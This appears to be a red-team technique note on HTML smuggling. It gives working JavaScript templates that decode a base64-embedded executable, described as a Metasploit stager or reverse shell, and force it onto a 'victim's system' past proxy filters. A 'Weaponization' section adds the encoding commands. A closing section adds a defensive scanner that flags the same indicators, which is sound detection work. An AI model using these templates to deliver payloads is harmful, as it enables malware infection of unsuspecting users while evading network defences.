Secondary Categories: 02-Social Engineering


Description:

This technique leverages the HTML5 anchor tag download attribute, which instructs the browser to save the linked resource to disk (rather than navigate to it) when the user clicks the hyperlink.

<html>
	<body>
		<!-- the download attribute makes the browser save the target instead of navigating to it -->
		<a href="/msfstaged.exe" download="msfstaged.exe">DownloadMe</a>
	</body>
</html>

When a user clicks this link from an HTML5-compatible browser, the msfstaged.exe file is automatically downloaded to the user's default download directory.

Although this works well, it exposes the filename and extension of the dropper in the page source and in the request, and it requires the user to click the link. To avoid this we can trigger the download from embedded JavaScript instead: the file is carried in the page as a base64 string, decoded in the browser into a Blob of type octet stream, and handed to a hidden anchor whose click is triggered programmatically, so the assembled file is saved without user interaction.

<html>
	<body>
		<script>
			// Decode a base64 string into the raw bytes of the file
			function base64ToArrayBuffer(base64) {
				var binary_string = window.atob(base64);
				var len = binary_string.length;
				var bytes = new Uint8Array(len);
				for (var i = 0; i < len; i++) {
					bytes[i] = binary_string.charCodeAt(i);
				}
				return bytes.buffer;
			}
			var file = '<FILE IN BASE64>';   // placeholder for the base64-encoded file
			var data = base64ToArrayBuffer(file);
			var blob = new Blob([data], {type: 'octet/stream'});
			var fileName = 'msfstaged.exe';
			// Build a hidden anchor that points at the in-memory blob and click it
			var a = document.createElement('a');
			document.body.appendChild(a);
			a.style = 'display: none';
			var url = window.URL.createObjectURL(blob);
			a.href = url;
			a.download = fileName;
			a.click();
			window.URL.revokeObjectURL(url);
		</script>
	</body>
</html>

To get this to work with Microsoft Edge (the legacy EdgeHTML-based versions; Chromium-based Edge follows the standard anchor path above) you must use window.navigator.msSaveBlob.

EXTENDED

HTML smuggling is a technique that allows bypassing proxy blocks on certain file types that the user is trying to download: because the file is assembled inside the browser from an encoded string, the proxy only ever sees HTML and JavaScript, never the blocked file type. You can use HTML smuggling to force the user to download those files onto the system.

Weaponization

First we need to base64 encode our file(s) (Windows and Linux variants shown):

base64.exe evil32.exe > .\evil.txt
cat evil32.exe | base64 > b64-payload.txt

Then we insert the encoded string into our HTML file and use JavaScript to decode it and download the result to the victim's system.

<!-- code from https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
<html>
    <body>
        <script>
            // Decode a base64 string into the raw bytes of the file
            function base64ToArrayBuffer(base64) {
                var binary_string = window.atob(base64);
                var len = binary_string.length;
                var bytes = new Uint8Array(len);
                for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
                return bytes.buffer;
            }
 
            // 32bit simple reverse shell
            var file = '<BASE64-FILE>';
            var data = base64ToArrayBuffer(file);
            var blob = new Blob([data], {type: 'octet/stream'});
            var fileName = 'evil.exe';
 
            if (window.navigator.msSaveOrOpenBlob) {
                // Legacy IE / EdgeHTML Edge: save the blob through the vendor API
                window.navigator.msSaveOrOpenBlob(blob, fileName);
            } else {
                // Every other browser: hidden anchor pointing at an object URL
                var a = document.createElement('a');
                console.log(a);
                document.body.appendChild(a);
                a.style = 'display: none';
                var url = window.URL.createObjectURL(blob);
                a.href = url;
                a.download = fileName;
                a.click();
                window.URL.revokeObjectURL(url);
            }
        </script>
    </body>
</html>
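From the defender's side, the building blocks shown above (atob, Blob, createObjectURL, a programmatic download plus a long base64 literal) are exactly what a proxy, mail gateway or sandbox can look for in an HTML body before the browser ever assembles the file. The following is an added example of such a heuristic scanner, not code from the original notes or from the Outflank post; the indicator list, weights and thresholds are assumptions chosen for illustration, and both sample pages are constructed.

```javascript
// Added example (not from the original notes): a heuristic scanner that flags
// HTML smuggling indicators in an HTML body. Weights/thresholds are assumptions.
const INDICATORS = [
  { name: 'atob decode',           re: /\batob\s*\(/,                    weight: 2 },
  { name: 'Blob construction',     re: /new\s+Blob\s*\(/,                weight: 2 },
  { name: 'object URL',            re: /createObjectURL\s*\(/,           weight: 2 },
  { name: 'programmatic download', re: /\.download\s*=/,                 weight: 2 },
  { name: 'legacy Edge save API',  re: /msSave(OrOpen)?Blob\s*\(/,       weight: 2 },
  { name: 'synthetic click',       re: /\.click\s*\(\s*\)/,              weight: 1 },
  { name: 'anchor download attr',  re: /<a\b[^>]*\bdownload\s*=/i,       weight: 1 },
  { name: 'executable filename',   re: /['"][^'"]*\.(exe|dll|hta|js|vbs|scr|iso|lnk)['"]/i, weight: 2 },
];
// A quoted base64 run long enough to carry a file rather than a short token.
const BIG_B64 = /['"]([A-Za-z0-9+/]{512,}={0,2})['"]/;

function scanHtml(html) {
  const matched = INDICATORS.filter(i => i.re.test(html));
  const hits = matched.map(i => i.name);
  let score = matched.reduce((sum, i) => sum + i.weight, 0);
  const b64 = html.match(BIG_B64);
  if (b64) {
    hits.push(`embedded base64 blob (${b64[1].length} chars)`);
    score += 3;
  }
  // Decode + Blob + download sink is the core pattern; a lone download attribute is not.
  const verdict = score >= 7 ? 'likely-smuggling' : score >= 3 ? 'suspicious' : 'benign';
  return { score, verdict, hits };
}

// Constructed samples: a page shaped like the smuggling snippet above (with a dummy
// base64 body) and an ordinary page offering a PDF through the download attribute.
const SMUGGLED_SAMPLE = `<html><body><script>
  var file = '${'Q'.repeat(600)}';
  var bin = window.atob(file);
  var blob = new Blob([bin], {type: 'octet/stream'});
  var a = document.createElement('a');
  a.href = window.URL.createObjectURL(blob);
  a.download = 'evil.exe';
  a.click();
</script></body></html>`;
const BENIGN_SAMPLE = `<html><body>
  <a href="/report.pdf" download="report.pdf">Report</a>
  <script>document.getElementById('go').click();</script>
</body></html>`;

console.log(scanHtml(SMUGGLED_SAMPLE)); // verdict: 'likely-smuggling'
console.log(scanHtml(BENIGN_SAMPLE));   // verdict: 'benign'
```

Run it with node against captured HTML bodies; the hit list tells an analyst which building blocks fired, and the plain download attribute from the first method on this page scores low on its own because the filename is visible and no in-browser assembly happens.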
